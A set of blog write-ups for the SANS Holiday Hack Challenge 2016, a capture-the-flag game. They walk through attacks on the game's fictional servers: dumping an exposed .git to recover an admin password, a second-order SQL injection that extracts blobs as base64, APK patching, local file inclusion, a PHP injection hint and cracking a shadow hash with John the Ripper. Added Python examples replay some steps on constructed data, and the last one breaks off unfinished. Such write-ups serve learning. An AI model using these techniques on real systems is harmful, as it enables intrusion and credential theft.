Showing posts with label holiday hack.

Saturday, January 7, 2017

SANS HHC 2016 - Part 5: Discombobulated Audio

SANS Holiday Hack Challenge 2016


Part 5: Discombobulated Audio

I have all the audio files:

Server (northpolewonderland.com)   File Name                                  File Size (Bytes)   MD5 Hash
analytics                          discombobulatedaudio2.mp3                  223248              f05c1ec6c536e455ec686973fa6b8e20
dungeon                            discombobulatedaudio3.mp3                  202362              0be15d00299af1a6bc1d11ab6f2696a0
dev                                debug-20161224235959-0.mp3                 218033              0a5ef5d7a0e89658a833d1892a9e1ec6
ads                                discombobulatedaudio5.mp3                  233357              3d87c1d31717f81f1966db4133f9e24d
ex                                 discombobulated-audio-6-XyzE3N9YqKNH.mp3   223244              4ee86b5b0eef9f8815ee7446272a6c06
analytics                          discombobulatedaudio7.mp3                  220943              313e7e370fd7d5232bb569f21856d9f4

I used Audacity on my Windows 10 laptop to apply filters and effects to the MP3 files.
At first I thought each file contained one word of a sentence, but processing each file on its own didn't help; they could not all be understood that way.

My friend, who works with audio and video editing, suggested playing them one after the other. Since there are 7 files of about 7 seconds each, I used Audacity's Change Tempo effect (which keeps the pitch) to shrink each file to 1 second, for a 7-second result.

7 files changed to 1 sec Tempo per file in order


When I played the result it said the sentence shown in the screenshot, which is a quote from Doctor Who: A Christmas Carol (2010).

That whole sentence was the passphrase for the last door, the one without a terminal, behind which I found The Doctor, who confessed to kidnapping Santa in order to use his powers for a greater good: erasing the 1978 Star Wars Holiday Special from existence.



9) Who is the villain behind the nefarious plot?
The Doctor. (Wrongly called Dr. Who, unless there's a legal copyright/trademark issue.)
To be more precise, the fourth incarnation of The Doctor from the BBC TV show Doctor Who (the scarf gave it away :))

10) Why had the villain abducted Santa?
The Doctor did it because he's a madman with a box, and was trying to use Santa's powerful North Pole Wonderland Magick to prevent the Star Wars Holiday Special from EVER being released, because he visited a universe where 1978 didn't have the SWHS and everyone was happy! :)

Friday, January 6, 2017

SANS HHC 2016 - Part 4.3: My Gosh... It's Full of Holes - Analytics (post authentication)

SANS Holiday Hack Challenge 2016


Continuing Part 4: My Gosh... It's Full of Holes - Analytics (post authentication)


Nmap shows that a .git directory is exposed for download at https://analytics.northpolewonderland.com/.git

I grab a copy of it with

wget -r https://analytics.northpolewonderland.com/.git/

cd analytics.northpolewonderland.com/

git status

git status lists every tracked file as deleted, because only the repository metadata came down and not the working tree; a git checkout then restores all of the PHP source code from the objects. (Recursive wget only works because the server allows directory listing under .git/; if listings are off, the dump has to follow HEAD, the refs and the object hashes instead.)

Looking at the commit history, I found interesting messages about the database dump sprusage.sql.

git log: interesting commit messages

I retrieve an old version of sprusage.sql from the history to get the administrator user and password.

Old version of the DB dump has the administrator's password
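Walking an exposed .git without the git client, as an added example that is not part of this write-up and not the challenge's code: the loose-object reader below resolves HEAD, follows the first-parent chain and returns every revision of one path, which is what recovering the older sprusage.sql amounts to (git log -p -- sprusage.sql by hand). The two-commit repository it builds for itself is constructed in a temporary directory and the password value in it is made up; pack files are not handled (run git unpack-objects on them, or use the real client, when a dump contains .git/objects/pack).

```python
import hashlib
import os
import tempfile
import zlib


def read_object(gitdir, sha):
    """Load one loose object: zlib(<type> <size>\\0<body>); verifies size and sha."""
    path = os.path.join(gitdir, "objects", sha[:2], sha[2:])
    with open(path, "rb") as fh:
        raw = zlib.decompress(fh.read())
    header, _, body = raw.partition(b"\0")
    typ, _, size = header.partition(b" ")
    if int(size) != len(body) or hashlib.sha1(raw).hexdigest() != sha:
        raise ValueError("corrupt object " + sha)
    return typ.decode(), body


def _text(path):
    with open(path) as fh:
        return fh.read()


def head_commit(gitdir):
    """Resolve HEAD to a commit sha through a loose ref or packed-refs."""
    head = _text(os.path.join(gitdir, "HEAD")).strip()
    if not head.startswith("ref: "):
        return head                      # detached HEAD: the sha itself
    ref, refpath = head[5:], os.path.join(gitdir, head[5:])
    if os.path.exists(refpath):
        return _text(refpath).strip()
    for line in _text(os.path.join(gitdir, "packed-refs")).splitlines():
        if line.endswith(" " + ref):
            return line.split()[0]
    raise FileNotFoundError(ref)


def parse_commit(body):
    """Commit object: header lines, blank line, message."""
    headers, _, message = body.partition(b"\n\n")
    info = {"parents": [], "message": message.decode(errors="replace")}
    for line in headers.split(b"\n"):
        key, _, value = line.partition(b" ")
        if key == b"parent":
            info["parents"].append(value.decode())
        elif key == b"tree":
            info["tree"] = value.decode()
    return info


def parse_tree(body):
    """Tree object: repeated '<mode> <name>\\0<20 raw sha bytes>'. Returns name -> sha."""
    entries, i = {}, 0
    while i < len(body):
        nul = body.index(b"\0", i)
        _mode, name = body[i:nul].split(b" ", 1)
        entries[name.decode()] = body[nul + 1:nul + 21].hex()
        i = nul + 21
    return entries


def blob_at(gitdir, tree_sha, path):
    """Walk tree objects along path; return the blob sha, or None if absent."""
    sha = tree_sha
    for part in path.split("/"):
        typ, body = read_object(gitdir, sha)
        sha = parse_tree(body).get(part) if typ == "tree" else None
        if sha is None:
            return None
    return sha


def file_history(gitdir, path):
    """Revisions of path on the first-parent chain from HEAD, newest first:
    (short sha, commit message, content or None when the file did not exist)."""
    history, sha = [], head_commit(gitdir)
    while sha:
        commit = parse_commit(read_object(gitdir, sha)[1])
        blob = blob_at(gitdir, commit["tree"], path)
        content = read_object(gitdir, blob)[1] if blob else None
        history.append((sha[:7], commit["message"].strip(), content))
        sha = commit["parents"][0] if commit["parents"] else None
    return history


# Constructed demo repository (two commits, one file); the credential is fake.
def write_object(gitdir, typ, body):
    raw = b"%s %d\0%s" % (typ.encode(), len(body), body)
    sha = hashlib.sha1(raw).hexdigest()
    os.makedirs(os.path.join(gitdir, "objects", sha[:2]), exist_ok=True)
    with open(os.path.join(gitdir, "objects", sha[:2], sha[2:]), "wb") as fh:
        fh.write(zlib.compress(raw))
    return sha


def make_demo_repo(root):
    gitdir = os.path.join(root, ".git")
    os.makedirs(os.path.join(gitdir, "refs", "heads"))
    who = b"author E <e@x.invalid> 0 +0000\ncommitter E <e@x.invalid> 0 +0000\n"
    parent = None
    for msg, sql in (("add usage db dump", b"INSERT INTO users VALUES ('administrator','fake-pass-1');\n"),
                     ("scrub credentials from dump", b"INSERT INTO users VALUES ('administrator','<removed>');\n")):
        blob = write_object(gitdir, "blob", sql)
        tree = write_object(gitdir, "tree", b"100644 sprusage.sql\0" + bytes.fromhex(blob))
        body = b"tree %s\n" % tree.encode() + (b"parent %s\n" % parent.encode() if parent else b"")
        parent = write_object(gitdir, "commit", body + who + b"\n" + msg.encode() + b"\n")
    with open(os.path.join(gitdir, "HEAD"), "w") as fh:
        fh.write("ref: refs/heads/master\n")
    with open(os.path.join(gitdir, "refs", "heads", "master"), "w") as fh:
        fh.write(parent + "\n")
    return gitdir


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        return file_history(make_demo_repo(tmp), "sprusage.sql")


if __name__ == "__main__":
    print(*demo(), sep="\n")
```

The newest commit shows the scrubbed dump; the one before it still carries the credential, which is exactly why "removed" secrets have to be rotated, not just committed over.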

From the commit messages I also noticed that the application appears to store SQL queries in the database.

edit.php carries a warning that it is experimental. It lets a logged-in user change the values of a row in the reports table, and the "query" field is taken straight from the HTTP GET request and stored without any sanitization; view.php then executes whatever is stored in that field whenever it is given a valid report id. The injection is second-order: the SQL is planted in one request and runs in another.



edit.php WARNING!!

edit.php vulnerability

view.php executes the content of the "query" row from the reports table

administrator is a valid user account

sprusage.sql shows an audio table that contains an MP3 blob per user id; this is where getaudio.php reads the MP3 files from, but it only allows the guest user's file to be downloaded that way, so it won't serve the administrator's.

'audio' table contains mp3 blobs

First I need to login as administrator to create a report to obtain a report id.

Report created and got valid id to use in edit.php and view.php

Then I can modify it with edit.php, using that id, and add a new query to it.

Testing edit.php normal functionality
Result of edit.php shows the query being executed

Here's the URL with the SQL injection to list the content of the audio table:
https://analytics.northpolewonderland.com/edit.php?id=700ff62d-cd01-4031-a52e-c6df60a0eb31&name=HACK&description=HACK+SQLI&query=SELECT%20*%20from%20audio
Result of edit.php with SQL injection adding the query field to list the content of the audio table
Using view.php with the report id shows the row we want, but the blob itself doesn't render; it does confirm that a second audio file is sitting in the audio table, so it's just a matter of running a query that returns the mp3 field in some text format.

I use edit.php to store a new query that returns the content of the MP3 as base64:
SELECT TO_BASE64(mp3) FROM audio WHERE username='administrator'

Use edit.php again to replace the stored query with the base64 extraction

Then view.php with the same id executes the new query and prints the base64 blob.


I selected the base64 output, saved it on my Kali box and decoded it back to MP3 with the base64 command (the copied text contains spaces, which base64 -d rejects, so they are stripped first):

root@igor-kali:~/hhack2016/analytics.northpolewonderland.com# cat mp3.b64 | sed 's/ //g' | base64 -d > discombobulatedaudio7.mp3
root@igor-kali:~/hhack2016/analytics.northpolewonderland.com# file discombobulatedaudio7.mp3
discombobulatedaudio7.mp3: Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo
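The second-order injection above, as an added example that is not part of this write-up and not the analytics application's own code: a Python/sqlite3 model of the reports and audio tables in which edit.php's behaviour (store the query parameter verbatim) and view.php's behaviour (execute whatever is stored) are reproduced, the page's TO_BASE64() query is run against it, and the pasted base64 is cleaned and decoded the way the sed/base64 step does. The table layout, the sample blobs and the hardened variant at the end are assumptions; SQLite has no TO_BASE64, so one is registered on the connection.

```python
import base64
import re
import sqlite3

# Constructed stand-ins for the MP3 blobs in the audio table (not the real files).
GUEST_MP3 = b"ID3\x03\x00\x00\x00guest-audio"
ADMIN_MP3 = b"ID3\x03\x00\x00\x00administrator-audio"
REPORT_ID = "700ff62d-cd01-4031-a52e-c6df60a0eb31"   # the report id used in the write-up

# Assumed canned queries for the hardened variant: a report may refer to these by name only.
CANNED_QUERIES = {
    "usage_by_user": "SELECT username, COUNT(*) FROM audio GROUP BY username ORDER BY username",
}


def setup_db():
    """In-memory model (assumed layout) of the analytics DB: reports.query holds SQL
    text, audio holds one MP3 blob per user."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no TO_BASE64(); register one so the MySQL query from the page runs here.
    conn.create_function("TO_BASE64", 1,
                         lambda b: None if b is None else base64.b64encode(b).decode())
    conn.executescript("""
        CREATE TABLE reports (id TEXT PRIMARY KEY, name TEXT, description TEXT, query TEXT);
        CREATE TABLE audio (id INTEGER PRIMARY KEY, username TEXT, mp3 BLOB);
    """)
    conn.executemany("INSERT INTO audio (username, mp3) VALUES (?, ?)",
                     [("guest", GUEST_MP3), ("administrator", ADMIN_MP3)])
    conn.execute("INSERT INTO reports VALUES (?, ?, ?, ?)",
                 (REPORT_ID, "weekly", "weekly usage", CANNED_QUERIES["usage_by_user"]))
    return conn


def edit_report(conn, report_id, name, description, query):
    """As edit.php behaves: the query parameter goes into the table unchecked."""
    cur = conn.execute("UPDATE reports SET name=?, description=?, query=? WHERE id=?",
                       (name, description, query, report_id))
    return cur.rowcount


def view_report(conn, report_id):
    """As view.php behaves. The id lookup is parameterised and safe on its own; the
    injection is second-order: the SQL *stored* by edit_report() is executed here."""
    row = conn.execute("SELECT query FROM reports WHERE id=?", (report_id,)).fetchone()
    if row is None:
        raise KeyError(report_id)
    return conn.execute(row[0]).fetchall()


def decode_base64_dump(text):
    """Equivalent of `sed 's/ //g' | base64 -d`: text copied from the page carries
    spaces and line breaks that must go before decoding."""
    return base64.b64decode(re.sub(rb"\s+", b"", text.encode()))


def edit_report_safe(conn, report_id, name, description, query_name):
    """Hardened (assumption): the row stores the *name* of a canned query; SQL text
    never comes from the request, so there is nothing for view to execute later."""
    if query_name not in CANNED_QUERIES:
        raise ValueError("unknown report query: %r" % query_name)
    cur = conn.execute("UPDATE reports SET name=?, description=?, query=? WHERE id=?",
                       (name, description, query_name, report_id))
    return cur.rowcount


def view_report_safe(conn, report_id):
    row = conn.execute("SELECT query FROM reports WHERE id=?", (report_id,)).fetchone()
    if row is None or row[0] not in CANNED_QUERIES:
        raise KeyError(report_id)
    return conn.execute(CANNED_QUERIES[row[0]]).fetchall()


def run_attack():
    """Replay the write-up end to end and return the recovered MP3 bytes."""
    conn = setup_db()
    edit_report(conn, REPORT_ID, "HACK", "HACK SQLI",
                "SELECT TO_BASE64(mp3) FROM audio WHERE username='administrator'")
    b64 = view_report(conn, REPORT_ID)[0][0]
    # Imitate copy-pasting from the browser, which breaks the text up with spaces/newlines.
    pasted = "\n".join(b64[i:i + 8] + " " for i in range(0, len(b64), 8))
    return decode_base64_dump(pasted)


if __name__ == "__main__":
    mp3 = run_attack()
    print(len(mp3), "bytes recovered, starting with", mp3[:3])
```

Note that the vulnerable view_report() is written with a parameterised lookup, which is what a quick code review would pass; the defect is that a column of the database is treated as code.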

Done!

We have all 7 MP3 files

SANS HHC 2016 - Part 4: My Gosh... It's Full of Holes - Dev / Ads / Ex

SANS Holiday Hack Challenge


Continuing with Part 4: My Gosh... It's Full of Holes


To continue examining and exploiting vulnerabilities it was necessary to finish setting up the environment.
You can find my setup here.


  • The Debug Server
For this one, nmap only shows TCP port 80, and the content of the APK file reveals an index.php URL.
Visiting the URL shows nothing, so we have to find out how the SantaGram app interacts with it.
Time to use my emulator and Burp Suite to look at the traffic.
At first I didn't see any traffic to the debug server (dev.northpolewonderland.com), so debug mode must be disabled.
I looked for debugging parameters in the APK decoded with apktool.

Searching for Debug parameters

The res/values/strings.xml file holds the parameter we need to change (debug_data_enabled), and the debug call is made from the EditProfile part of the app. I changed debug_data_enabled to true, recompiled and re-signed the APK as explained by Josh Wright here and in this video, but no luck: editing the profile didn't trigger any communication with the debug server.
So I went back and decided to attack the logic in EditProfile.smali instead. Tracing debug_data_enabled from res/values/strings.xml to res/values/public.xml gave me its resource id, 0x7f07001e.


Traced the variable 0x7f07001e (debug_data_enabled) in EditProfile.smali
The code compares v0 (the value loaded from the strings resource) with v3 (a constant with value "true"). I simply changed the const-string v3 value from "true" to "false", so the comparison succeeds with the default resource value and debug is enabled by default. Recompiled, re-signed and pushed to my emulator again.

Debug enabled - Traffic going from SantaGram to Dev

Great, we have a connection and a JSON to play with, as recommended by my greatest friend in the North Pole, Alabaster Snowball :)

Alabaster talking about JSON parameters
Using Burp Suite Repeater, I re-sent the request and found that the response contains exactly the same data plus an extra field called verbose, set to false.

BurpSuite repeater showing verbose parameter

I added that parameter to my request and set it to true; this made the server return a list of the files in the same directory as index.php, including the MP3 file.

JSON output with verbose=true shows MP3 file
root@igor-kali:~/hhack2016/dev.northpolewonderland.com# wget dev.northpolewonderland.com/debug-20161224235959-0.mp3
--2016-12-26 14:10:55--  http://dev.northpolewonderland.com/debug-20161224235959-0.mp3
Resolving dev.northpolewonderland.com (dev.northpolewonderland.com)... 35.184.63.245
Connecting to dev.northpolewonderland.com (dev.northpolewonderland.com)|35.184.63.245|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 218033 (213K) [audio/mpeg]
Saving to: ‘debug-20161224235959-0.mp3’

debug-20161224235959-0.mp3         100%[===================================>] 212.92K  --.-KB/s    in 0.1s   

2016-12-26 14:10:55 (1.54 MB/s) - ‘debug-20161224235959-0.mp3’ saved [218033/218033]

  • The Banner Ad Server
The nmap scan shows TCP port 80 listening and accepting connections; pointing a browser there brings up the banner ad server.
By the way, if you have an ad blocker, the site won't display in your browser; disable it before proceeding.
I noticed a Login option in the top right corner, but also decided to look into the HTML source of the website for clues.

Ads main website

Ads HTML Source showing Meteor Framework
In the source code I saw that it was using the Meteor framework, which one of the elves had mentioned.

 Pepper Minstix talks about Meteor
I read Tim Medin's blog post from HackFest 2016 and installed Tampermonkey with his Meteor Miner script to enumerate subscriptions and collections.
This way I found a URL that isn't linked from the main website: http://ads.northpolewonderland.com/admin/quotes

Spotted /admin/quotes with Meteor Miner

I looked at the collections and clicked on HomeQuotes, which has one record with an audio field, which is what I'm looking for.



HomeQuotes is showing an audio record 

I opened the browser's web console and ran HomeQuotes.find().fetch(); it returned an array of 5 objects, and the 5th one holds the URL of the MP3 file: http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3
Meteor publishes whole collection records to the client over DDP, so anything a subscription sends down can be read from the console even if the page never displays it; the server's publish functions, not the UI, decide what the client gets.

Web console - Result of HomeQuotes.find().fetch()

  • The Uncaught Exception Handler Server
While using the SantaGram app I noticed that it crashed every time I used the Search option and scrolled down the posts, and each crash sends a message to the http://ex.northpolewonderland.com/exception.php URL.
SantaGram Crashes in Search 

JSON Request to ex server


The response to this JSON request was a JSON object indicating that a crashdump PHP file had been created in the docs directory.
crashdump php file created


Using Burp Suite Repeater I changed the operation parameter, and the verbose error message listed the only two accepted values: WriteCrashDump and ReadCrashDump.
Exception JSON operations

I changed the operation to ReadCrashDump to see what else I could find, and it told me that a crashdump key must be set in the JSON for it to work. So this operation reads back the crashdump-XXXXX.php files it creates. I tried it without all the other values and got HTTP 500 errors, which I read as the server trying to execute the PHP and failing.

ReadCrashDump needs crashdump JSON key


HTTP 500 trying to read a crashdump

This looks like the Local File Inclusion vulnerability that Sugarplum Mary talked about, and using the technique from Jeff McJunkin's blog post I extracted the source code of exception.php as a base64 dump.

Base64 Dump of the exception.php file

MP3 reference found in exception.php


NOTE: as you may have noticed, the crashdump files are PHP, and the server executes them if you point a browser (or curl) at them; they just print back the data you sent to exception.php. Looking at the code, you can inject your own PHP into them: other players used a print_r(scandir('..')) to list the files and found the MP3 that way instead of the base64 exfiltration. You can do more than that 😏

Thursday, January 5, 2017

SANS HHC 2016 - Part 3: A Fresh-Baked Holiday Pi

SANS Holiday Hack Challenge 2016

Part 3: A Fresh-Baked Holiday Pi


Player Inventory - All pieces of the Cranberry Pi

After finding all the pieces of the Cranberry Pi computer, Holly Evergreen provided a link to download the image of its SD card.



What's the Cranberry Pi for?

Download the SD image

5) What is the password for the "cranpi" account on the Cranberry Pi system?

I went and talked to Wunorse Openslae, under the tree in the middle of the town, and he had a great tip for working with SD card images.

How to manage SD images
Following the article, I mounted the SD image and pulled the /etc/shadow file.
Another elf, Minty Candycane, had a tip about John the Ripper and which wordlist to use (rockyou), and that's what I used to crack the password in about 20 minutes while I walked through the park collecting NetWars coins :)

root@igor-kali:/mnt/etc# john --wordlist=/usr/share/wordlists/rockyou.txt shadow
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:16 0.04% (ETA: 07:35:40) 0g/s 389.0p/s 389.0c/s 389.0C/s bugger..marilu
0g 0:00:00:19 0.04% (ETA: 07:36:11) 0g/s 390.1p/s 390.1c/s 390.1C/s pheonix..Samantha
0g 0:00:05:20 0.69% (ETA: 08:09:37) 0g/s 369.2p/s 369.2c/s 369.2C/s digimate..death7
0g 0:00:12:41 1.74% (ETA: 07:25:29) 0g/s 385.5p/s 385.5c/s 385.5C/s serena5..selena9
yummycookies     (cranpi)
1g 0:00:19:23 DONE (2016-12-12 19:37) 0.000859g/s 390.5p/s 390.5c/s 390.5C/s yveth..yulyul
Use the "--show" option to display all of the cracked passwords reliably

6) How did you open each terminal door, and where had the villain imprisoned Santa?

Itchy's /out.pcap file
I took the long way round on this one because I didn't check a few basic things first; that's on me.
I'll give the quick answer instead of the whole process I went through. At some point I will share a write-up with all the details.
The PCAP file is readable only by the itchy user, so we need some privilege-change mechanism to read it.
First, check the sudo permissions:

SUDO permissions (sudo -l)

So scratchy, our user, can execute two commands as itchy: tcpdump and strings.
We run tcpdump on the file first (as itchy, via sudo).
Part 1 of the password

Now, the second part of the password requires the strings command; I know this because tcpdump shows a binary file being downloaded over HTTP.

strings ouput
This doesn't show much either; it's the same thing tcpdump showed me.
The file command is missing in this terminal; it would have helped solve this quicker.
So, playing with the strings options:
$ strings --help
Usage: strings [option(s)] [file(s)]
 Display printable strings in [file(s)] (stdin by default)
 The options are:
  -a - --all                Scan the entire file, not just the data section [default]
  -d --data                 Only scan the data sections in the file
  -f --print-file-name      Print the name of the file before each string
  -n --bytes=[number]       Locate & print any NUL-terminated sequence of at
  -<number>                   least [number] characters (default 4).
  -t --radix={o,d,x}        Print the location of the string in base 8, 10 or 16
  -o                        An alias for --radix=o
  -T --target=<BFDNAME>     Specify the binary file format
  -e --encoding={s,S,b,l,B,L} Select character size and endianness:
                            s = 7-bit, S = 8-bit, {b,l} = 16-bit, {B,L} = 32-bit
  @<file>                   Read options from <file>
  -h --help                 Display this information
  -v -V --version           Print the program's version number
strings: supported targets: elf64-x86-64 elf32-i386 elf32-x86-64 a.out-i386-linux pei-i386 pei-x86-64 elf64-l1om elf64-k1om elf64-little elf64-big elf32-little elf32-big pe-x86-64 pe-i386 plugin srec symbolsrec verilog tekhex binary ihex
Report bugs to <http://www.sourceware.org/bugzilla/>
The one that gave me the result was strings -e l, which selects 16-bit little-endian characters (UTF-16LE, the encoding Windows programs use for their strings); the default scan only looks for runs of 7-bit bytes, so a UTF-16 string, with a NUL byte between every character, never shows up.


Second half found

So the password is santaslittlehelper

I managed to copy the pcap file to my machine, and this is what the file command returns:
root@igor-kali:~/hhack2016# file out.pcap
out.pcap: tcpdump capture file (little-endian) - version 2.4 (Ethernet, capture length 262144)

The tcpdump file is little-endian (that's the byte order of the capture file header, which is what file reports); the reason -e l worked is a different one: the second half of the password was stored as UTF-16LE text inside the data carried by the capture.
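What strings -e l actually does, as an added example that is not from this write-up: a minimal Python reimplementation of the default 7-bit scan next to the 16-bit little-endian scan, run over a constructed byte buffer in which an ASCII HTTP request and a UTF-16LE string sit side by side. The UTF-16LE string appears only in the -e l scan, which is why plain strings on the capture showed nothing beyond what tcpdump had. The buffer and the string inside it are made up.

```python
import re

# Constructed sample: an ASCII HTTP request followed by a fake binary body that carries
# a UTF-16LE string, the way Windows executables store their strings.
SAMPLE = (b"GET /out.bin HTTP/1.1\r\nHost: example\r\n\r\n"
          + b"\x7fELF\x02\x01\x01" + bytes(range(16))
          + "second_half".encode("utf-16-le")
          + b"\x00\x00\xff\xfe")

PRINTABLE = rb"[\x20-\x7e]"   # what `strings` treats as printable: 7-bit graphic chars and space


def scan(data, encoding="s", min_len=4):
    """Core of `strings`: encoding "s" is the default 7-bit scan, "l" is `-e l`
    (each character stored as <byte> 0x00). Returns (offset, text) pairs like
    `strings -t d`. finditer tries every byte offset, so odd alignment is found too."""
    if encoding == "s":
        pat, step = re.compile(PRINTABLE + rb"{%d,}" % min_len), 1
    elif encoding == "l":
        pat, step = re.compile(rb"(?:" + PRINTABLE + rb"\x00){%d,}" % min_len), 2
    else:
        raise ValueError("unsupported encoding %r" % encoding)
    # [::step] drops the NUL high bytes of the 16-bit form; ASCII is unchanged.
    return [(m.start(), m.group()[::step].decode("ascii")) for m in pat.finditer(data)]


def strings_ascii(data, min_len=4):
    """Equivalent of plain `strings`."""
    return [text for _, text in scan(data, "s", min_len)]


def strings_utf16le(data, min_len=4):
    """Equivalent of `strings -e l`."""
    return [text for _, text in scan(data, "l", min_len)]


if __name__ == "__main__":
    for enc in ("s", "l"):
        for offset, text in scan(SAMPLE, enc):
            print("%06x -e %s %s" % (offset, enc, text))
```

The same scan with "b" would need the NUL before the character instead (strings -e b, big-endian); a binary of unknown origin is worth scanning with both.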

The File Deep down


Ok, let's run find . -type f



find deep down

I mistyped the path several times, and my find command kung fu isn't that good, so I just decided to walk all the way there….
Care for a ride?
Here we go…

elf@4f0fa5334794:~/.doormat/. $ ls
   bin  not_here
elf@4f0fa5334794:~/.doormat/. $ cd bin
elf@4f0fa5334794:~/.doormat/. /bin$ ls
elf@4f0fa5334794:~/.doormat/. /bin$ ls -al
total 8
drwxr-xr-x  2 root root 4096 Dec  6 19:39 .
drwxr-xr-x 16 root root 4096 Dec  6 19:40 ..
elf@4f0fa5334794:~/.doormat/. /bin$ cd ..
elf@4f0fa5334794:~/.doormat/. $ cd not_here
elf@4f0fa5334794:~/.doormat/. /not_here$ ls -al
total 8
drwxr-xr-x  2 root root 4096 Dec  6 19:39 .
drwxr-xr-x 16 root root 4096 Dec  6 19:40 ..
elf@4f0fa5334794:~/.doormat/. /not_here$ cd ..
elf@4f0fa5334794:~/.doormat/. $ l s-al
bash: l: command not found
elf@4f0fa5334794:~/.doormat/. $ ls -al
total 20
drwxr-xr-x 14 root root 4096 Dec  6 19:40 
drwxr-xr-x 16 root root 4096 Dec  6 19:40 .
drwxr-xr-x 18 root root 4096 Dec  6 19:40 ..
drwxr-xr-x  2 root root 4096 Dec  6 19:39 bin
drwxr-xr-x  2 root root 4096 Dec  6 19:39 not_here
elf@4f0fa5334794:~/.doormat/. $ cd \
elf@4f0fa5334794:~/.doormat/. / $ ls
\  opt  var
elf@4f0fa5334794:~/.doormat/. / $ ls -al
total 20
drwxr-xr-x 14 root root 4096 Dec  6 19:40 .
drwxr-xr-x 16 root root 4096 Dec  6 19:40 ..
drwxr-xr-x 12 root root 4096 Dec  6 19:40 \
drwxr-xr-x  2 root root 4096 Dec  6 19:40 opt
drwxr-xr-x  2 root root 4096 Dec  6 19:39 var
elf@4f0fa5334794:~/.doormat/. / $ cd \\
elf@4f0fa5334794:~/.doormat/. / /\$ ls
\\  ls  santa
elf@4f0fa5334794:~/.doormat/. / /\$ ls -al
total 20
drwxr-xr-x 12 root root 4096 Dec  6 19:40 .
drwxr-xr-x 14 root root 4096 Dec  6 19:40 ..
drwxr-xr-x 10 root root 4096 Dec  6 19:40 \\
drwxr-xr-x  2 root root 4096 Dec  6 19:40 ls
drwxr-xr-x  2 root root 4096 Dec  6 19:40 santa
elf@4f0fa5334794:~/.doormat/. / /\$ cd \\\
> \
> ^C
elf@4f0fa5334794:~/.doormat/. / /\$ cd \\\\
elf@4f0fa5334794:~/.doormat/. / /\/\\$ ls
Don't Look Here!  holiday  temp
elf@4f0fa5334794:~/.doormat/. / /\/\\$ cd Don\'t\ Look\ Here\!
elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!$ ls -al
total 20
drwxr-xr-x  8 root root 4096 Dec  6 19:40 .
drwxr-xr-x 10 root root 4096 Dec  6 19:40 ..
drwxr-xr-x  6 root root 4096 Dec  6 19:40 You are persistent, aren't you?
drwxr-xr-x  2 root root 4096 Dec  6 19:40 files
drwxr-xr-x  2 root root 4096 Dec  6 19:40 secret
elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!$ cd secret
elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/secret$ ls
elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/secret$ ls -al
total 8
drwxr-xr-x 2 root root 4096 Dec  6 19:40 .
drwxr-xr-x 8 root root 4096 Dec  6 19:40 ..
elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/secret$ cd ..
elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!$ cd You\ are\ persistent\,\ aren\`t\ you\?
bash: cd: You are persistent, aren`t you?: No such file or directory
elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!$ cd You\ are\ persistent\,\ aren\'t\ you\?
elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?$ ls -al
total 20
drwxr-xr-x 2 root root 4096 Dec  6 19:40 '
drwxr-xr-x 6 root root 4096 Dec  6 19:40 .
drwxr-xr-x 8 root root 4096 Dec  6 19:40 ..
drwxr-xr-x 2 root root 4096 Dec  6 19:40 cookbook
drwxr-xr-x 2 root root 4096 Dec  6 19:40 temp
elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?$ cd \'
elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Dec  6 19:40 .
drwxr-xr-x 6 root root 4096 Dec  6 19:40 ..
-rw-r--r-- 1 root root   17 Dec  6 19:39 key_for_the_door.txt
elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'$ cat  key_for_the_door.txt
key: open_sesame
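The same walk done with find instead of by hand, as an added example that is not from this write-up: Python rebuilds a small replica of the .doormat tree in a temporary directory (the odd directory names are copied from the transcript above, the file content from the key file; the replica is constructed and assumes a POSIX filesystem), enumerates every regular file the way find -type f does, and emits a shell-quoted cat command for each, which is the quoting the manual cd chain kept tripping over.

```python
import os
import shlex
import tempfile

# Directory names copied from the transcript: ". " is dot-space, then a single
# backslash, then two backslashes, then the names with spaces and quotes.
DEEP_PATH = [".doormat", ". ", "\\", "\\\\", "Don't Look Here!",
             "You are persistent, aren't you?", "'"]
DECOYS = [[".doormat", ". ", "bin"], [".doormat", ". ", "not_here"],
          [".doormat", ". ", "\\", "\\\\", "Don't Look Here!", "secret"]]
KEY_NAME = "key_for_the_door.txt"
KEY_TEXT = "key: open_sesame\n"


def build_tree(root):
    """Recreate the constructed replica under root; return the key file's path."""
    for parts in DECOYS:
        os.makedirs(os.path.join(root, *parts), exist_ok=True)
    deep = os.path.join(root, *DEEP_PATH)
    os.makedirs(deep, exist_ok=True)
    key = os.path.join(deep, KEY_NAME)
    with open(key, "w") as fh:
        fh.write(KEY_TEXT)
    return key


def find_files(root, name=None):
    """`find root -type f [-name name]`: os.walk never needs the names quoted."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if name is None or fname == name:
                hits.append(os.path.join(dirpath, fname))
    return sorted(hits)


def cat_command(path):
    """A `cat` line bash will parse correctly whatever the path contains: shlex.quote
    wraps it in single quotes and turns an embedded ' into '"'"'."""
    return "cat " + shlex.quote(path)


def quote_roundtrips(path):
    """Check: the quoted command splits back into exactly ['cat', path]."""
    return shlex.split(cat_command(path)) == ["cat", path]


def demo():
    """Build the replica, find the key file, return (relative path, cat command, content)."""
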